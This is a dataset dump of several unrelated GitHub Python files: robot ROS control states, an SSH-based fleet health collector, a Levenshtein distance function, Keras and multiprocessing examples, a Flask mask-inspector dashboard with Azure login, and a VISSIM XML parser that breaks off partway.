self.tick()\n\nclass SetIdle(State):\n\n def setRobotPose(self):\n global data\n msg = Float32MultiArray()\n for auton in data:\n if auton.title == self.ros_node.auton_title:\n msg.data = auton.start_pose\n self.ros_node.publish('/robot_set_pose', Float32MultiArray, msg, latching = True)\n rospy.loginfo(\"Reset Robot Pose\")\n\n def setIdle(self):\n # Retract intake\n intake_state = String()\n intake_state.data = \"retract\"\n self.ros_node.publish(\"/auto/intake/state\", String, intake_state, latching = True)\n rospy.loginfo(\"Retracted Intake\")\n\n # Shooter idle\n shooter_state = String()\n shooter_state.data = \"idle\"\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Idle\")\n\n # Flywheel idle\n flywheel_state = String()\n flywheel_state.data = \"idle\"\n self.ros_node.publish(\"/auto/flywheel/state\", String, flywheel_state, latching = True)\n rospy.loginfo(\"Flywheel Idle\")\n\n # Hood idle\n hood_state = String()\n hood_state.data = \"idle\"\n self.ros_node.publish(\"/auto/hood/state\", String, hood_state, latching = True)\n rospy.loginfo(\"Hood Idle\")\n\n # Path Idle\n self.ros_node.publish(\"/pathTable/startPathIndex\", Float32, -1, latching = True)\n\n\n\nclass StartPath(State):\n\n # Actions\n def start_path(self, index):\n \"\"\" This gets the path data from the json file and publishes to diff_drive \"\"\"\n # Checks for updated data\n self.ros_node.publish(\"/pathTable/startPathIndex\", Float32, index, latching = True)\n \n\n# This is ROBOT SPECIFIC\nclass Intake(State):\n\n # Actions\n def deploy_intake(self):\n \"\"\" This publishes a msg to deploy the intake \"\"\"\n intake_state = String()\n intake_state.data = \"deploy\"\n\n self.ros_node.publish(\"/auto/intake/state\", String, intake_state, latching = True)\n rospy.loginfo(\"Deployed Intake\")\n\n def retract_intake(self):\n \"\"\" This publishes a msg to retract the intake \"\"\"\n intake_state = String()\n intake_state.data = \"retract\"\n\n self.ros_node.publish(\"/auto/intake/state\", String, intake_state, latching = True)\n rospy.loginfo(\"Retracted Intake\")\n\nclass Color(State):\n\n # Actions\n def enable_color(self):\n \"\"\" This publishes a msg to deploy the intake \"\"\"\n color_state = String()\n color_state.data = \"enable\"\n\n self.ros_node.publish(\"/auto/color/state\", String, color_state, latching = True)\n rospy.loginfo(\"Enabled Color Sensor\")\n\n def disable_color(self):\n \"\"\" This publishes a msg to retract the intake \"\"\"\n color_state = String()\n color_state.data = \"disable\"\n\n self.ros_node.publish(\"/auto/color/state\", String, color_state, latching = True)\n rospy.loginfo(\"Disabled Color Sensor\")\n\nclass Shooter(State):\n\n # This puts the shooter in idle mode and allows other sub systems to do specific functions\n def idle(self):\n \"\"\" This puts the shooter in idle mode \"\"\"\n shooter_state = String()\n shooter_state.data = \"idle\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Idle\")\n \n # Overrides the other states because it needs to control all three subsystems \n def hide_shoot(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"hide_shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Hide Shoot\")\n \n def hide_poop(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"hide_poop\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Hide Poop\")\n\n def lob_prime(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"lob_prime\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Lob Prime\")\n\n def lob_shoot(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"lob_shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Lob Shoot\")\n\n def start_prime(self):\n \"\"\" This starts the turret tracking, adjusting rpm, and hood angle \"\"\"\n shooter_state = String()\n shooter_state.data = \"prime\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Prime\")\n\n def start_shoot(self):\n \"\"\" This makes the turret begin to shoot \"\"\"\n shooter_state = String()\n shooter_state.data = \"shoot\"\n\n self.ros_node.publish(\"/auto/shooter/state\", String, shooter_state, latching = True)\n rospy.loginfo(\"Shooter Shooting\")\n\nclass Flywheel(Shooter):\n\n # Conditions\n def reached_rpm(self, rpm):\n \"\"\" Checks if the fly wheel has reached the wanted rpm \"\"\"\n if self.ros_node.get_data(\"/auto/flywheel/current/rpm\") == rpm:\n return True\n return False\n\n # Actions (Only works if Shooter is in idle)\n def idle_flywheel(self):\n \"\"\" This puts the shooter into idle mode \"\"\"\n flywheel_state = String()\n flywheel_state.data = \"idle\"\n\n self.ros_node.publish(\"/auto/flywheel/state\", String, flywheel_state, latching = True)\n rospy.loginfo(\"Flywheel Idle\")\n\n def start_spin_up(self, rpm):\n \"\"\" This starts the robot's spin up to a specific rpm \"\"\"\n flywheel_state = String()\n flywheel_state.data = \"spin_up\"\n\n flywheel_rpm = Float32()\n flywheel_rpm.data = rpm\n\n self.ros_node.publish(\"/auto/flywheel/state\", String, flywheel_state, latching = True)\n self.ros_node.publish(\"/auto/flywheel/wanted/rpm\", Float32, flywheel_rpm, latching = True)\n rospy.loginfo(\"Flywheel Spinup\")\n\nclass Hood(Shooter):\n\n # Actions (Only works if Shooter is in idle)\n def idle_hood(self):\n \"\"\" This puts the hood into idle mode \"\"\"\n hood_state = String()\n hood_state.data = \"idle\"\n\n self.ros_node.publish(\"/auto/hood/state\", String, hood_state, latching = True)\n rospy.loginfo(\"Hood Idle\")\n\n def actuate_hood(self, angle):\n \"\"\" This adjusts the hood to the given angle \"\"\"\n hood_state = String()\n hood_state.data = \"actuate\"\n\n self.ros_node.publish(\"/auto/hood/state\", String, hood_state, latching = True)\n rospy.loginfo(\"Hood Actuate\")\n","repo_name":"Team624/robot2022-ros","sub_path":"src/autonomous/src/auton_scripts/auton_modules/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"29212831167","text":"import os\nimport sys\n\nimport paramiko\nimport argparse\nimport logging\nimport time\n\nfrom random import randint\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import serialization\n\nfrom lib import storage\nfrom lib import config\n\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s %(message)s')\nglobal_logger = logging.getLogger(__name__)\n\n\ndef store_stats(ip_addr, stats, username, password):\n #stats has the format: os, cpu_usage, mem_usage, uptime, event_logs\n db = storage.Storage(username, password)\n db_row_id = db.store_machine_stats(ip_addr, stats.split(','))\n global_logger.info('Stats recorded: %s', db_row_id)\n\n\ndef get_crypto_keys():\n private_key = rsa.generate_private_key(public_exponent=65537,\n key_size=2048,\n backend=default_backend())\n public_key = private_key.public_key()\n return private_key, public_key\n\ndef get_public_pem_data(public_key):\n return public_key.public_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo)\n\n\ndef get_decrypted_output(encrypted_file, private_key):\n file = open(encrypted_file, 'rb')\n ciphertext = file.read()\n plaintext = ''\n try:\n plaintext = private_key.decrypt(ciphertext, padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(), label=None))\n except ValueError as e:\n global_logger.error('Major issue happened with decryption: %s', e)\n\n return plaintext\n\ndef write_to_file(filename, content, mode):\n try:\n pk_file = open(filename, mode)\n pk_file.write(content)\n pk_file.close()\n return True\n except:\n global_logger.error('Error while writin to file')\n return False\n\n# TODO(mohamedzouaghi): Refactor the ssh_connect function to make it shorter\ndef ssh_connect(machine, max_retry=config.DEFAULT_RETRY):\n # machine is of a type Client namedtuple\n ssh_client = paramiko.SSHClient()\n ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n retry = 0\n while retry <= max_retry:\n try:\n ssh_client.connect(machine.ip, int(machine.port), username=machine.username,\n password=machine.password, timeout=4)\n break\n except (paramiko.ssh_exception.NoValidConnectionsError, OSError) as e:\n global_logger.warn('Issue wih ssh connection: %s.', e)\n if retry + 1 <= max_retry:\n sleep_duration = 30 + 30 * retry\n global_logger.warn('Sleeping for %d seconds before retrying.', sleep_duration)\n time.sleep(sleep_duration)\n retry += 1\n\n if retry > max_retry:\n fatal_error_msg = 'Fatal error with connection. Exiting.'\n global_logger.fatal(fatal_error_msg)\n sys.exit('Fatal error with connection. Exiting.')\n\n source_file_path = os.path.join('..', 'client_script')\n client_script = 'local_collector.py'\n # below is for linux only\n target_file_path = '/tmp/'\n # below to be removed only useful for debug\n target_client_script = client_script[:-3] + str(randint(0, 10000)) + client_script[-3:]\n local_copy_stats_results_filepath = 'encrypted_stats'\n\n\n private_key, public_key = get_crypto_keys()\n # pem_data is the serialization of the pubic_key to bytes so client machine can re-generate\n # the public key\n public_pem_data = get_public_pem_data(public_key)\n source_pk_filepath = 'public_keys' \n pk_filename = 'pk_' + machine.ip + str(randint(0, 100000)) + '.pk'\n\n\n if not write_to_file(os.path.join(source_pk_filepath, pk_filename), public_pem_data, 'wb'):\n global_logger.fatal('Fatal error with public key storing. Exiting.')\n\n \n sftp = ssh_client.open_sftp()\n copy_pk_results = sftp.put(os.path.join(source_pk_filepath, pk_filename), os.path.join(target_file_path, pk_filename))\n global_logger.info('copy_pk_results: %s', copy_pk_results)\n\n sftp = ssh_client.open_sftp()\n sftp_results = sftp.put(os.path.join(source_file_path, client_script), os.path.join(target_file_path, target_client_script))\n global_logger.info('sftp_results: %s', sftp_results)\n\n # TODO(mohamedzouaghi): Need to change this so it suports Windows and MacOS\n command = 'python3 ' + target_file_path + target_client_script + ' -f ' + target_file_path + pk_filename\n stdin, stdout, stderr = ssh_client.exec_command(command)\n encrypted_remote_filename = stdout.read().decode('utf-8').rstrip()\n\n encrypted_local_name = os.path.join(local_copy_stats_results_filepath, encrypted_remote_filename.split('/')[-1].rstrip())\n\n global_logger.info('received stdout:\\n%s\\nReceived stderr:\\n%s' % (encrypted_remote_filename, stderr.read()))\n copy_stats_results = sftp.get(encrypted_remote_filename, encrypted_local_name)\n decrypted_output = get_decrypted_output(encrypted_local_name, private_key)\n global_logger.info('received_output_aftr_decryption: %s', decrypted_output.decode('utf-8'))\n return decrypted_output.decode('utf-8')\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--username', required=False, default=config.DEFAULT_USERNAME,\n help='username used for DB operations.')\n parser.add_argument('-p', '--password', required=False, default=config.DEFAULT_PASSWORD,\n help='username used for DB operations.')\n parser.add_argument('-r', '--retry', required=False, default=config.DEFAULT_RETRY, type=int,\n help='Numbr of ssh connection attempts in case first attemp fails. Eg: If 1, there will be on more attempt etc...')\n\n args = parser.parse_args()\n\n remote_machines = config.get_clients_details(include_alerts=False)\n for m in remote_machines:\n machine_stat = ssh_connect(m, max_retry=args.retry)\n store_stats(m.ip, (machine_stat), args.username, args.password)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"mohamedzouaghi/fleet_health","sub_path":"server_script/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32368459409","text":"import numpy as np\n\n\ndef print_distances(distances, token1Length, token2Length):\n for t1 in range(token1Length + 1):\n for t2 in range(token2Length + 1):\n print(int(distances[t1][t2]), end=\" \")\n print()\n\n\ndef lev_dist_words(tokenA, tokenB):\n distances = np.zeros((len(tokenA) + 1, len(tokenB) + 1))\n\n for tA in range(1, len(tokenA) + 1):\n for tB in range(1, len(tokenB) + 1):\n charA = tokenA[tA - 1]\n charB = tokenB[tB - 1]\n if charA == charB:\n distances[tA][tB] = distances[tA - 1][tB - 1]\n else:\n before = distances[tA][tB - 1]\n upper = distances[tA - 1][tB]\n diagonal = distances[tA - 1][tB - 1]\n\n if (before <= upper and before <= diagonal):\n distances[tA][tB] = before + 1\n elif (upper <= before and upper <= diagonal):\n distances[tA][tB] = upper + 1\n else:\n distances[tA][tB] = diagonal + 1\n\n print_distances(distances, len(tokenA), len(tokenB))\n return distances[len(tokenA)][len(tokenB)]\n\n\ndist = lev_dist_words(\"студент\", \"николай\")\nprint(dist)\n","repo_name":"NikolayKolibarov/CSCB817-Natural-Language-Processing","sub_path":"min-edit-distance/levenshtein.py","file_name":"levenshtein.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2793746796","text":"#Classifying newswires: a multi-class classification example\n\nfrom keras.datasets import reuters\nimport numpy as np\nfrom keras import models\nfrom keras import layers\nimport matplotlib.pyplot as plt\n\ndef vectorize_sequences(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n for i, sequence in enumerate(sequences):\n results[i, sequence] = 1.\n return results\n\ndef to_one_hot(labels, dimension=46):\n results = np.zeros((len(labels), dimension))\n for i, label in enumerate(labels):\n results[i, label] = 1.\n return results\n\n(train_data, train_labels), (test_data, test_labels) = reuters.load_data(num_words=10000)\n\n#ENCODING DATA\n# Our vectorized training data\nx_train = vectorize_sequences(train_data)\n# Our vectorized test data\nx_test = vectorize_sequences(test_data)\n\n#ENCODING LABELS\n# Our vectorized training labels\none_hot_train_labels = to_one_hot(train_labels)\n# Our vectorized test labels\none_hot_test_labels = to_one_hot(test_labels)\n\n#MODEL DEFINITION\nmodel = models.Sequential()\nmodel.add(layers.Dense(64, activation='relu', input_shape=(10000,)))\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(46, activation='softmax'))\n\nmodel.compile(optimizer='rmsprop',loss='categorical_crossentropy',metrics=['accuracy'])\n\n#TRAINING THE MODEL\nx_val = x_train[:1000]\npartial_x_train = x_train[1000:]\ny_val = one_hot_train_labels[:1000]\npartial_y_train = one_hot_train_labels[1000:]\n\nhistory = model.fit(partial_x_train,partial_y_train,epochs=20,batch_size=512,validation_data=(x_val, y_val))\n\n#PLOTING TRAINING AND VALIDATION LOSS\nplt.figure(1)\nplt.subplot(211)\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(loss) + 1)\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.subplot(212)\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\nplt.show()\n\n#EVALUATE THE MODEL\nresults = model.evaluate(x_test, one_hot_test_labels)\nprint(results)\nprint(\"Done!!!!!!!!!!!!!!!!!\")","repo_name":"davidruizhidalgo/unsupervisedRemoteSensing","sub_path":"0_MATLAB/0_Initial Codes/codeBaseExamples Python/deepNetworksExamples/multiclassExample.py","file_name":"multiclassExample.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"6"} +{"seq_id":"15249003622","text":"# -*- encoding=utf-8 -*-\n# Authentication is inspired from the tutorial by Microsoft form azure active\n# directory authentication.\n# Tutorial Source: https://github.com/rebremer/ms-identity-python-webapp-backend\nimport msal\nimport uuid\nimport config\nimport functools\nfrom camera import Camera\nfrom flask_session import Session\nfrom bson.objectid import ObjectId\nimport flask_monitoringdashboard as dashboard\nfrom werkzeug.middleware.proxy_fix import ProxyFix\nfrom flask import Flask, flash, redirect, render_template, request, Response, session, url_for\n\n\napp = Flask(__name__)\napp.config.from_object(config)\nSession(app)\ndashboard.bind(app)\napp.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1, x_host=1)\ncameras_collection = config.db['cameras']\nsecurity_collection = config.db['security']\nfiles_collection = config.db['fs.files']\nchunks_collection = config.db['fs.chunks']\nsettings_collection = config.db['settings']\n\n\ndef login_required(f):\n @functools.wraps(f)\n def decorated_function(*args, **kwargs):\n if not session.get(\"user\"):\n return redirect(url_for('login', next=request.url))\n return f(*args, **kwargs)\n return decorated_function\n\n\ndef generate(camera):\n while True:\n frame = camera.get_frame()\n if frame is not None:\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n frame + b'\\r\\n\\r\\n'\n )\n\n\ndef _load_cache():\n cache = msal.SerializableTokenCache()\n if session.get(\"token_cache\"):\n cache.deserialize(session[\"token_cache\"])\n return cache\n\n\ndef _save_cache(cache):\n if cache.has_state_changed:\n session[\"token_cache\"] = cache.serialize()\n\n\ndef _build_msal_app(cache=None, authority=None):\n return msal.ConfidentialClientApplication(\n config.CLIENT_ID,\n authority=authority or config.AUTHORITY,\n client_credential=config.CLIENT_SECRET,\n token_cache=cache\n )\n\n\ndef _build_auth_url(authority=None, scopes=None, state=None):\n return _build_msal_app(authority=authority).get_authorization_request_url(\n scopes or [],\n state=state or str(uuid.uuid4()),\n redirect_uri=url_for(\"authorized\", _external=True)\n )\n\n\ndef _get_token_from_cache(scope=None):\n # This web app maintains one cache per session\n cache = _load_cache()\n cca = _build_msal_app(cache=cache)\n accounts = cca.get_accounts()\n # So all account(s) belong to the current signed-in user\n if accounts:\n result = cca.acquire_token_silent(scope, account=accounts[0])\n _save_cache(cache)\n return result\n\n\n@app.route(\"/\", methods=['GET'])\n@login_required\ndef index():\n cameras = list(cameras_collection.find({}))\n security = list(security_collection.find({}))\n images = list(files_collection.find({}))\n settings = list(settings_collection.find({}))\n return render_template('pages/home.html',\n cameras=cameras,\n security=security,\n images=images,\n settings=settings\n )\n\n\n@app.route(\"/create/camera\", methods=['POST'])\n@login_required\ndef create_camera():\n _id = uuid.uuid4() \n data = request.form.copy()\n try:\n if len(list(security_collection.find({}))) < 1:\n raise Exception\n cameras_collection.insert_one({\n \"_id\": _id,\n \"location\": data.get('location'),\n \"url\": data.get('url'),\n \"status\": data.get('status'),\n \"supervisor_id\": data.get('supervisor_id')\n })\n flash(\n f\"success|Camera at {data.get('location')} has been successfully added.\")\n except:\n flash(f\"danger|Camera couldn't be added\")\n finally:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/create/security\", methods=['POST'])\n@login_required\ndef create_security():\n _id = uuid.uuid4()\n data = request.form.copy()\n try:\n security_collection.insert_one({\n \"_id\": _id,\n \"first_name\": data.get('first_name'),\n \"last_name\": data.get('last_name'),\n \"email\": data.get('email'),\n \"phone\": data.get('phone')\n })\n flash(\n f\"success|Security member {data.get('first_name')} {data.get('last_name')} has been successfully added.\")\n except:\n flash(f\"danger|Security member couldn't be added\")\n finally:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/edit/camera/\", methods=['POST'])\n@login_required\ndef edit_camera(id):\n data = request.form.copy()\n # In case we want to use webcam\n # url = int(data.get('url')) if data.get('url') == '0' or data.get('url') == '1' else data.get('url')\n try:\n cameras_collection.update_one({\"_id\": id}, {\"$set\": {\n \"location\": data.get('location'),\n \"url\": data.get('url'),\n \"status\": data.get('status'),\n \"supervisor_id\": data.get('supervisor_id')\n }})\n flash(\"success|Camer has been successfully updated.\")\n except:\n flash(\"danger|Camera couldn't be updated\")\n finally:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/edit/security/\", methods=['POST'])\n@login_required\ndef edit_security(id):\n data = request.form.copy()\n try:\n security_collection.update_one({\"_id\": id}, {\"$set\": {\n \"first_name\": data.get('first_name'),\n \"last_name\": data.get('last_name'),\n \"email\": data.get('email'),\n \"phone\": data.get('phone')\n }})\n flash(f\"success|Security member has been successfully updated.\")\n except:\n flash(f\"danger|Security member couldn't be updated\")\n finally:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/delete/camera/\", methods=['POST'])\n@login_required\ndef delete_camera(id):\n try:\n cameras_collection.delete_one({\"_id\": id})\n flash(f\"success|Camera has been successfully deleted.\")\n except:\n flash(f\"danger|Camera couldn't be deleted\")\n finally:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/delete/security/\", methods=['POST'])\n@login_required\ndef delete_security(id):\n try:\n cameras_collection.update_many(\n {'supervisor_id': str(id)},\n {'$set': {\n 'supervisor_id': -1\n }})\n security_collection.delete_one({\"_id\": id})\n flash(f\"success|Security member has been successfully deleted.\")\n except:\n flash(f\"danger|Security member couldn't be deleted\")\n finally:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/settings/edit\", methods=['POST'])\n@login_required\ndef change_settings():\n data = request.form.copy()\n settings_collection.update_one({\"id\": 0}, {\n \"$set\": {\n \"confidence\": float(data['confidence']),\n \"lock_duration\": int(data['lock_duration'])\n }\n })\n flash(\"success|Settings have been updated successfully.\")\n return redirect(url_for('index'))\n\n\n@app.route('/video/feed/')\n@login_required\ndef video_feed(id):\n try:\n return Response(generate(Camera(id)),\n mimetype='multipart/x-mixed-replace; boundary=frame'\n )\n except:\n flash(\"danger|There is no camera with this id\")\n return redirect(url_for('index'))\n\n\n@app.route('/images/')\n@login_required\ndef get_image(files_id):\n chunks = chunks_collection.find_one({\"files_id\": ObjectId(files_id)})\n return Response((b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n chunks['data'] + b'\\r\\n\\r\\n'\n ),\n mimetype='multipart/x-mixed-replace; boundary=frame'\n )\n\n\n@app.route(\"/login\")\ndef login():\n session[\"state\"] = str(uuid.uuid4())\n # Technically we could use empty list [] as scopes to do just sign in,\n # here we choose to also collect end user consent upfront\n auth_url = _build_auth_url(\n scopes=config.SCOPE, state=session[\"state\"]\n )\n return render_template(\"pages/welcome.html\", auth_url=auth_url)\n\n\n@app.route(\"/logout\")\ndef logout():\n # Wipe out user and its token cache from session\n session.clear()\n # Also logout from your tenant's web session\n return redirect(config.AUTHORITY +\n \"/oauth2/v2.0/logout\" +\n \"?post_logout_redirect_uri=\" +\n url_for(\"index\", _external=True)\n )\n\n\n@app.route(config.REDIRECT_PATH)\ndef authorized():\n if request.args.get('state') != session.get(\"state\"):\n # No-OP. Goes back to Index page\n return redirect(url_for(\"index\"))\n # Authentication/Authorization failure\n if \"error\" in request.args:\n return render_template(\"auth_error.html\", result=request.args)\n if request.args.get('code'):\n cache = _load_cache()\n result = _build_msal_app(cache=cache).acquire_token_by_authorization_code(\n request.args['code'],\n # Misspelled scope would cause an HTTP 400 error here\n scopes=config.SCOPE,\n redirect_uri=url_for(\"authorized\", _external=True)\n )\n if \"error\" in result:\n return render_template(\"auth_error.html\", result=result)\n session[\"user\"] = result.get(\"id_token_claims\")\n _save_cache(cache)\n return redirect(url_for(\"index\"))\n\n\nif __name__ == \"__main__\":\n # Run the server\n app.run(host='0.0.0.0', threaded=True)\n","repo_name":"othmanKisha/In-Door-Face-Mask-Inspector","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"23852231565","text":"# Testing multiple return valued function\n\ndef get_fullname():\n first = input(\"Enter your first name: \")\n last = input(\"Enter your second name: \")\n return first, last\n\nfirstNm,lastNm = get_fullname()\nprint(\"First name: \" + firstNm)\nprint(\"Last name: \" + lastNm)\n","repo_name":"Chelton-dev/ICTPRG-Python","sub_path":"func13multiple.py","file_name":"func13multiple.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14008440187","text":"# we will recap how we can create and start multiple processes.\n# then we will learn how we can share data between processes, \n# we will recap how to use locks to prevent race and how to use queues\n# we will learn how to use a process pool to easily manage multiple processes.\n\n\n# This is the how to setup multiprocessing\nfrom multiprocessing import Process\nimport os\nimport time\n\n\ndef square_numbers():\n for i in range(100):\n i * i\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n\n processes = []\n num_processes = os.cpu_count()\n # number of CPUs on the machine, Usually a good choice for the number of processes\n \n\n # create processes and assign a function for each process\n for i in range(num_processes):\n p = Process(target=square_numbers) \n # if target has args Process(target=square_numbers, args=())\n processes.append(p)\n\n # start all processes\n for p in processes:\n p.start()\n\n # wait for all processes to finish\n # block the main program until these processes are finished\n for p in processes:\n p.join()\n\n\n print('end main')","repo_name":"JeffreyAsuncion/Python_Intermediate_FCC","sub_path":"17_Multiprocessing/multi.py","file_name":"multi.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8384228531","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport argparse\nfrom xml.dom import minidom\nimport numpy as np\nfrom xml.dom.minidom import Document\n\n\ndef _dict_from_node_attributes(node):\n \"\"\"takes xml node and returns a dict with its attributes\n \"\"\"\n return dict((attn, node.getAttribute(attn)) for attn in\n node.attributes.keys())\n\n\n# FUNKTIONEN\ndef parse_flows(xmldoc):\n \"\"\"parses the vehicleInput flows from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: flow data by VISSIM start link id\n :rtype: dict\n\n .. note:: time frames are converted from [ms] -> [s]\n .. todo:: remove the redundant col2 in ['flow']\n \"\"\"\n flw_d = dict() # local flows dict\n for v_input in xmldoc.getElementsByTagName('vehicleInput'):\n v_input_d = _dict_from_node_attributes(v_input)\n v_input_d[\"vehComp\"] = []\n v_input_d[\"volType\"] = []\n v_input_d[\"flow\"] = []\n for volume in v_input.getElementsByTagName('timeIntervalVehVolume'):\n v_input_d[\"vehComp\"].append(volume.getAttribute('vehComp'))\n v_input_d[\"volType\"].append(volume.getAttribute('volType'))\n # keeping (timeInterval, volume, vehicle composition)\n # time interval converted to [s]\n v_input_d[\"flow\"].append(\n [float(volume.getAttribute('timeInt').split(\" \")[1]) / 1000,\n float(volume.getAttribute('volume')),\n float(volume.getAttribute('vehComp'))]) # FIXME: nasty, redundant\n v_input_d[\"flow\"] = np.array(v_input_d[\"flow\"])\n # here goes a VISSIM linkId as key (& value)\n flw_d[v_input_d[\"link\"]] = v_input_d\n return flw_d\n\n\ndef parse_max_acc(xmldoc):\n \"\"\"parses the vehicle acceleration distributions from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of 1st acceleration function data point value by str(numeric id)\n :rtype: dict\n \"\"\"\n acc_d = dict()\n for max_acc in xmldoc.getElementsByTagName('maxAccelerationFunction'):\n acc_d[max_acc.getAttribute('no')] = max_acc.getElementsByTagName(\n 'accelerationFunctionDataPoint')[0].getAttribute('y')\n return acc_d\n\n\ndef parse_speed_avg(xmldoc):\n \"\"\"parses the vehicle speed distribution from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of some speed averages by str(numeric id)\n :rtype: dict\n\n .. note:: the average is only approximated\n \"\"\"\n spd_d = dict() # local speeds dict\n for deSpeeDis in xmldoc.getElementsByTagName('desSpeedDistribution'):\n # get mean speed\n num = 0.\n sum_val = 0.\n data_points = deSpeeDis.getElementsByTagName('speedDistributionDataPoint')\n for point in data_points:\n num += 1\n sum_val += float(point.getAttribute('x'))\n spd_d[deSpeeDis.getAttribute('no')] = str((sum_val / num) / 3.6)\n return spd_d\n\n\ndef parse_length(xmldoc):\n \"\"\"parses the vehicle type lengths from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: map of lengths by str(numeric type)\n :rtype: dict\n \"\"\"\n len_d = dict()\n model_d = dict()\n # get model data\n for model in xmldoc.getElementsByTagName('model2D3D'):\n model_d[model.getAttribute('no')] = model.getElementsByTagName(\n 'model2D3DSegment')[0].getAttribute('length')\n # calculate length data\n for model_dist in xmldoc.getElementsByTagName('model2D3DDistribution'):\n elements = model_dist.getElementsByTagName(\n 'model2D3DDistributionElement')\n length = 0\n total_probability = 0\n for element in elements:\n total_probability += float(element.getAttribute('share'))\n for element in elements:\n length += (\n float(element.getAttribute('share')) / total_probability) * \\\n float(model_d[element.getAttribute('model2D3D')])\n len_d[model_dist.getAttribute('no')] = str(length)\n return len_d\n\n\ndef parse_veh_comp(xmldoc):\n \"\"\"parses the vehicle composition from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: relevant VISSIM vehicleComposition data\n :rtype: dict of list of dict\n \"\"\"\n veh_cmp_d = dict() # local vehicle compositions' dict\n for vehicle_comp in xmldoc.getElementsByTagName('vehicleComposition'):\n rel_flows = vehicle_comp.getElementsByTagName(\n 'vehicleCompositionRelativeFlow')\n flow_l = []\n for flow in rel_flows:\n flw_d = {\n 'desSpeedDistr': flow.getAttribute('desSpeedDistr'),\n 'rel_flow': flow.getAttribute('relFlow'),\n 'vehType': flow.getAttribute('vehType'),\n }\n flow_l.append(flw_d)\n # list of dictionaries\n veh_cmp_d[vehicle_comp.getAttribute('no')] = flow_l\n return veh_cmp_d\n\n\ndef parse_vehicle_types(xmldoc, acc_d, length_d):\n \"\"\"parses the vehicle types from the VISSIM data\n :param xmldoc: input VISSIM xml\n :type xmldoc: xml.dom.minidom.Document\n :return: relevant 